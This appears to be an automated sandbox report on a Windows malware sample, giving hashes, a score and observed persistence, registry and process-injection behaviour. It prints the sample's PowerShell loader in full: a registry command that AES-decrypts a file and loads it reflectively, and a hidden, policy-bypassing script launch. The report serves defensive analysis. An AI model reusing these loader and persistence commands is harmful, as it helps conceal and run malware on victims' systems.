53f94edcd6279d8ae7b4f704b25b58ca91c70f9d5efcd107e4e5c0fc0002370d

Analysis

max time kernel
41s
max time network
48s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
03/12/2022, 07:22

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

8752108c47b3c85486cdf81610557d75968d2538e71f1e364f6d7fa1da6bce3d.exe
Size

300.5MB
MD5

0732096091fcd4d27ebe9b01027865b0
SHA1

eedc8aa1609a1ccf5299569121393b326ecd4168
SHA256

8752108c47b3c85486cdf81610557d75968d2538e71f1e364f6d7fa1da6bce3d
SHA512

cac9d1cd5d2a15f88d40f7f09730b9d4513a3846c1008c3120f4f639e1d2fad280fc3079ce3783f15d0dc3ca6dd895545af2be43fda2f68031ed12953613d836
SSDEEP

98304:x+HdoFEjIRW3P7FskmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmY:xSPWW7Fsl

Score

7^/10

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zICcanPsyNOdv.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\MPmCUAUsLOHmopuHLvqjkQAXxJau\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\MPmCUAUsLOHmopuHLvqjkQAXxJau\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\MPmCUAUsLOHmopuHLvqjkQAXxJau\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]245,7,43,214,245,17,179,155,225,134,225,139,231,162,193,35,144,217,219,114,175,135,99,127,216,40,167,63,18,218,101,161);$A.IV=@([byte]131,194,173,171,115,27,182,147,191,231,70,132,87,143,36,78);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\JclfaATWMhuM.uoEZquXfKVQFUoHOJHjOuMEbHeNJYmG'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[txbqfGPP0iRs7KgmZc6YT7hBdcq89npFzzOJwJslfMQxjTLx.EI2wqouJDoZkkr6Vwtjc4JJ0rc3moA1LLSUa1AzLhhIltFAkj38R]::nKiK9NkpwM4SaOp4l2NdizZst496S4if();\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\.uoEZquXfKVQFUoHOJHjOuMEbHeNJYmG	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\.uoEZquXfKVQFUoHOJHjOuMEbHeNJYmG\ = "mpmcuauslohmopuhlvqjkqaxxjau"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\MPmCUAUsLOHmopuHLvqjkQAXxJau\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000_CLASSES\MPmCUAUsLOHmopuHLvqjkQAXxJau	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1808	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1808	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1220 wrote to memory of 1808	1220	8752108c47b3c85486cdf81610557d75968d2538e71f1e364f6d7fa1da6bce3d.exe	27
PID 1220 wrote to memory of 1808	1220	8752108c47b3c85486cdf81610557d75968d2538e71f1e364f6d7fa1da6bce3d.exe	27
PID 1220 wrote to memory of 1808	1220	8752108c47b3c85486cdf81610557d75968d2538e71f1e364f6d7fa1da6bce3d.exe	27
PID 1220 wrote to memory of 1808	1220	8752108c47b3c85486cdf81610557d75968d2538e71f1e364f6d7fa1da6bce3d.exe	27

C:\Users\Admin\AppData\Local\Temp\8752108c47b3c85486cdf81610557d75968d2538e71f1e364f6d7fa1da6bce3d.exe
"C:\Users\Admin\AppData\Local\Temp\8752108c47b3c85486cdf81610557d75968d2538e71f1e364f6d7fa1da6bce3d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1220
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -windowstyle hidden -file "C:\Users\Admin\AppData\Local\Temp\14lvn2spe6n66sj9fwvugkobrj2d1481.ps1"
  2⤵
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1808

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\14lvn2spe6n66sj9fwvugkobrj2d1481.ps1

Filesize
887KB

MD5
38b113bfc88e23b2f94d460ea6029198

SHA1
be65264ff8b837325f8d229e6c90ccb926db76a5

SHA256
872f44ccb4c39f2da379c082ac4ad5acc06b363374a615929def47c18b0f9642

SHA512
c8524b8f43f3f3ba9fce7f8e68e44a35eb8bbfdd8ef449528a0a88a15c7cd3df946c1b0a5ad78abfcab91567a027a71bf1cb4f24536895cc6078d42ad51d5da0

Download Submit
memory/1220-54-0x00000000765B1000-0x00000000765B3000-memory.dmp

Filesize
8KB

Download
memory/1808-58-0x0000000074060000-0x000000007460B000-memory.dmp

Filesize
5.7MB

Download
memory/1808-59-0x0000000074060000-0x000000007460B000-memory.dmp

Filesize
5.7MB

Download